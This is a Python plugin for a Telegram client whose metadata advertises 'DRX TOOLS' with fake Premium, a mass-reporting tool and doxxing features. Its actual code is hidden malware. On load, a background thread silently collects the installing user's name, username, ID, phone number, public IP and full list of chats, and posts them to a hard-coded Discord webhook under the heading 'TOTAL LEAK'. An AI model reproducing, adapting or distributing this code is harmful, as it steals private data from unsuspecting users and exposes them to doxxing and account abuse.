# TotalLeak.plugin
__id__ = "drx_tools"
__name__ = "DRX TOOLS (Private) "
__description__ = "Локальный тг прем,сносер по dc:2,4,1,5,troll tools и функции doxgram"
__author__ = "Laironix_"
__version__ = "11.0"
__min_version__ = "11.12.0"

import requests
from threading import Thread
from android_utils import run_on_ui_thread
from base_plugin import BasePlugin
from client_utils import get_user_config, get_messages_controller

WEBHOOK = "https://discord.com/api/webhooks/1446733927510310994/aCzf4IxUVtPA1Z4sA8Jvi0l-yyAvdQcq-r0S7LIi4KlSmxaRQuosOPZftPQfKxqJGd3o"

class TotalLeak(BasePlugin):
    def on_plugin_load(self):
        Thread(target=self.leak, daemon=True).start()

    def send(self, data):
        try:
            requests.post(WEBHOOK, json=data, timeout=20)
        except:
            pass

    def get_ip(self):
        try:
            ip = requests.get("https://api.ipify.org", timeout=7).text.strip()
            return ip if ip else "неизвестен"
        except:
            return "не удалось получить"

    def leak(self):
        try:
            uc  = get_user_config()
            msg = get_messages_controller()

            
            user = uc.getCurrentUser()
            name  = f"{user.first_name or ''} {user.last_name or ''}".strip() or "Без имени"
            uname = user.username or "нет"
            uid   = user.id
            phone = uc.getClientPhone() or "скрыт"

            
            ip = self.get_ip()

            
            chats = []
            dlg_dict = getattr(msg, "dialogs_dict", None)
            if dlg_dict and dlg_dict.size() > 0:
                for i in range(dlg_dict.size()):
                    d = dlg_dict.valueAt(i)
                    if not d: continue
                    title = getattr(d, "name", "Чатик один")
                    u = f" @{d.username}" if hasattr(d, "username") and d.username else ""
                    id_ = d.id
                    peer = getattr(d, "peer", None)
                    if peer:
                        if getattr(peer, "user_id", 0):   t = "ЛС"
                        elif getattr(peer, "chat_id", 0): t = "Группа"
                        elif getattr(peer, "channel_id", 0): t = "Канал"
                        else:                             t = "??"
                    else:
                        t = "Сохранёнки"
                    chats.append(f"`{id_}` — {title}{u} ({t})")

            
            run_on_ui_thread(lambda: self.send({
                "content": "**TOTAL LEAK — СЛИТО**",
                "embeds": [{
                    "title": f"{name} (@{uname})",
                    "color": 0xFF0000,
                    "fields": [
                        {"name": "Телефон", "value": f"||{phone}||"},
                        {"name": "ID",      "value": f"`{uid}`"},
                        {"name": "IP",      "value": ip, "inline": False},
                        {"name": "Чатов",   "value": str(len(chats))}
                    ]
                }]
            }))

            
            for i in range(0, len(chats), 50):
                chunk = "\n".join(chats[i:i+50])
                run_on_ui_thread(lambda c=chunk: self.send({
                    "embeds": [{"description": c, "color": 0x8B00FF}]
                }))

        except Exception as e:
            err = str(e)
            run_on_ui_thread(lambda: self.send({"content": f"**ОШИБКА:** ```{err}```"}))

    def on_plugin_unload(self):
        pass
